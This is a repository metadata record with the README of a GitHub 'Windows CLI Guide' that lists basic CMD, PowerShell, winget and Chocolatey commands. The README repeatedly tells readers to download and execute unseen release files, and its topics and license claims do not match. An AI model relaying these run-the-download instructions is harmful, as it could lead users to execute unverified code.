{"id":29132165,"url":"https://github.com/alex868-max/windows-cli-guide","last_synced_at":"2025-06-30T06:16:26.365Z","repository":{"id":301624986,"uuid":"1009796359","full_name":"alex868-max/windows-cli-guide","owner":"alex868-max","description":"Explore essential CMD and PowerShell commands in this interactive guide. Enhance your terminal skills with scripts and helpful comparisons. 🚀👨💻","archived":false,"fork":false,"pushed_at":"2025-06-27T20:55:18.000Z","size":4028,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":0,"default_branch":"main","last_synced_at":"2025-06-27T21:34:59.095Z","etag":null,"topics":["chocolatey","cli","cmd","cmd-scripts","edge-impulse","linha-de-comando","linux-cli","nodejs","privacy","qemu-kvm","ubuntu-bionic","uninstall","uwp","virt-manager","vnc-server","windows-terminal","winget","winget-cli"],"latest_commit_sha":null,"homepage":"https://alex868-max.github.io","language":null,"has_issues":false,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/alex868-max.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2025-06-27T18:17:07.000Z","updated_at":"2025-06-27T20:55:21.000Z","dependencies_parsed_at":"2025-06-27T21:46:53.008Z","dependency_job_id":null,"html_url":"https://github.com/alex868-max/windows-cli-guide","commit_stats":null,"previous_names":["alex868-max/windows-cli-guide"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/alex868-max/windows-cli-guide","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/alex868-max%2Fwindows-cli-guide","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/alex868-max%2Fwindows-cli-guide/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/alex868-max%2Fwindows-cli-guide/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/alex868-max%2Fwindows-cli-guide/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/alex868-max","download_url":"https://codeload.github.com/alex868-max/windows-cli-guide/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/alex868-max%2Fwindows-cli-guide/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":262720750,"owners_count":23353462,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["chocolatey","cli","cmd","cmd-scripts","edge-impulse","linha-de-comando","linux-cli","nodejs","privacy","qemu-kvm","ubuntu-bionic","uninstall","uwp","virt-manager","vnc-server","windows-terminal","winget","winget-cli"],"created_at":"2025-06-30T06:16:25.680Z","updated_at":"2025-06-30T06:16:26.347Z","avatar_url":"https://github.com/alex868-max.png","language":null,"readme":"# Windows CLI Guide: Master CMD, PowerShell, Winget \u0026 More! 🚀\n\n![Windows CLI Guide](https://img.shields.io/badge/Windows%20CLI%20Guide-v1.0-blue.svg)  \n[![Download Releases](https://img.shields.io/badge/Download%20Releases-Click%20Here-brightgreen.svg)](https://github.com/alex868-max/windows-cli-guide/releases)\n\n---\n\n## Overview\n\nWelcome to the **Windows CLI Guide**! This repository serves as a visual guide to help you learn the essential commands for CMD, PowerShell, Winget, Chocolatey, and other terminal interfaces. Whether you're a beginner or just looking to sharpen your skills, this guide is a handy resource for navigating the command line world.\n\n---\n\n## Table of Contents\n\n1. [What is CLI?](#what-is-cli)\n2. [Getting Started](#getting-started)\n3. [Key Topics](#key-topics)\n   - [CMD](#cmd)\n   - [PowerShell](#powershell)\n   - [Winget](#winget)\n   - [Chocolatey](#chocolatey)\n   - [Batch Scripts](#batch-scripts)\n4. [Installation Instructions](#installation-instructions)\n5. [Usage Examples](#usage-examples)\n6. [Contributing](#contributing)\n7. [License](#license)\n\n---\n\n## What is CLI?\n\nCLI stands for Command Line Interface. It allows users to interact with the operating system by typing commands into a terminal. Unlike graphical user interfaces (GUIs), CLIs offer a more direct and efficient way to control your system, especially for repetitive tasks.\n\n---\n\n## Getting Started\n\nTo get started with this guide, simply download the latest release from our [Releases section](https://github.com/alex868-max/windows-cli-guide/releases). Make sure to execute the downloaded files to access the full features of this guide.\n\n---\n\n## Key Topics\n\n### CMD\n\nThe Command Prompt (CMD) is a built-in Windows application that allows users to execute commands. Here are some basic commands to get you started:\n\n- `dir`: Lists the files and directories in the current directory.\n- `cd`: Changes the current directory.\n- `copy`: Copies files from one location to another.\n\n### PowerShell\n\nPowerShell is a more advanced command-line shell and scripting language. It is designed for system administration and automation. Key commands include:\n\n- `Get-Process`: Displays a list of all running processes.\n- `Set-ExecutionPolicy`: Changes the user preference for the PowerShell script execution policy.\n- `Get-Service`: Retrieves the status of services on your machine.\n\n### Winget\n\nWinget is the Windows Package Manager. It allows you to install, upgrade, and manage software packages from the command line. Common commands are:\n\n- `winget install \u003cpackage\u003e`: Installs a specified package.\n- `winget upgrade`: Upgrades all installed packages.\n- `winget list`: Lists all installed packages.\n\n### Chocolatey\n\nChocolatey is a package manager for Windows. It simplifies the installation of software. Here are some commands you can use:\n\n- `choco install \u003cpackage\u003e`: Installs a package.\n- `choco upgrade \u003cpackage\u003e`: Upgrades a specific package.\n- `choco uninstall \u003cpackage\u003e`: Uninstalls a package.\n\n### Batch Scripts\n\nBatch scripts are text files that contain a series of commands to be executed by the command line. They can automate repetitive tasks. A simple batch script might look like this:\n\n```batch\n@echo off\necho Hello, World!\npause\n```\n\n---\n\n## Installation Instructions\n\n1. Visit the [Releases section](https://github.com/alex868-max/windows-cli-guide/releases) to download the latest version.\n2. Once downloaded, extract the files if they are in a compressed format.\n3. Open your terminal (CMD or PowerShell).\n4. Navigate to the directory where you extracted the files.\n5. Execute the main script to start using the guide.\n\n---\n\n## Usage Examples\n\nHere are some practical examples to help you understand how to use the commands effectively.\n\n### Example 1: Using CMD to List Files\n\nOpen CMD and type:\n\n```cmd\ndir\n```\n\nThis command will display all files and folders in the current directory.\n\n### Example 2: Using PowerShell to Get Running Processes\n\nOpen PowerShell and type:\n\n```powershell\nGet-Process\n```\n\nThis will list all the processes currently running on your machine.\n\n### Example 3: Installing Software with Winget\n\nTo install a package using Winget, open your terminal and type:\n\n```cmd\nwinget install 7zip\n```\n\nThis command will download and install 7zip on your machine.\n\n### Example 4: Managing Packages with Chocolatey\n\nTo install a software package using Chocolatey, use:\n\n```cmd\nchoco install git\n```\n\nThis will install Git on your system.\n\n### Example 5: Creating a Batch Script\n\nCreate a new text file and save it with a `.bat` extension. Add the following commands:\n\n```batch\n@echo off\necho Welcome to the Batch Script!\npause\n```\n\nRun the script by double-clicking the file.\n\n---\n\n## Contributing\n\nWe welcome contributions to improve this guide. If you have suggestions, corrections, or additional commands to add, please fork the repository and submit a pull request. Make sure to follow the contribution guidelines.\n\n---\n\n## License\n\nThis project is licensed under the MIT License. See the LICENSE file for details.\n\n---\n\nFeel free to explore the various commands and examples in this guide. For further information, visit the [Releases section](https://github.com/alex868-max/windows-cli-guide/releases) to download the latest updates and features.","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Falex868-max%2Fwindows-cli-guide","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Falex868-max%2Fwindows-cli-guide","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Falex868-max%2Fwindows-cli-guide/lists"}